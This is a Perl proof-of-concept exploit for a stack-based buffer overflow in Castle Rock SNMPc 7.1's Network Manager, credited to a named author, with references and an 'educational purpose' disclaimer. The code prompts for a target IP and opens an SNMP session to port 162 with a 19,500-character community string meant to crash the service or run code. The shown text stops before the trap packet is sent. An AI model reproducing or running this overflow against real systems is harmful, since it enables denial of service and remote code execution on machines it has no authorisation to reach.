1 #!usr/bin/perl −w
2
3 ################################################################################################################
4 # Stack−based buffer overflow in the Network Manager in Castle Rock Computing SNMPc 7.1 and
5 # earlier allows remote attackers to cause a denial of service (crash) or execute arbitrary code
6 # via a long community string in an SNMP TRAP packet.
7 #
8 # Refer:
9 # http://web.nvd.nist.gov/view/vuln/detail?execution=e3s1
10 # http://www.securityfocus.com/bid/28990/discuss
11 #
12 #
13 # To run this exploit on MS Windows replace "#!usr/bin/perl −w" with "#!Installation_path_for_perl −w"
14 # (say #!C:/Program Files/Perl/bin/perl −w)
15 #
16 # This was strictly written for educational purpose. Use it at your own risk.
17 # Author will not bare any responsibility for any damages watsoever.
18 #
19 # Author: Praveen Darshanam
20 # Email: praveen[underscore]recker[at]sify.com
21 # Date: 11th November, 2008
22 #
23 # NOTE: Thanks to all my colleagues at iPolicy
24 # For reliable security solutions please visit http://www.ipolicynetworks.com/
25 #
26 ##################################################################################################################
27
28 use Net::SNMP;
29
30 printf("Enter the IP Adress of Vulnerable SNMP Manager ");
31 $host_vulnerable = <STDIN>;
32 $port = 162;
33 $community = "D" x 19500;
34
35 ($session, $error) = Net::SNMP−>session(
36 −hostname => $host_vulnerable,
37 −port => $port,
38 −community => $community, # v1/v2c
39 −maxmsgsize => 65535,
40 );
41 if (!defined($session))
42 {
43 printf("ERROR: %s.\n", $error);
44 exit 1;
45 }
46
47 $ipaddress = "172.16.16.4";
48 #Throwing an error without Agent so randomly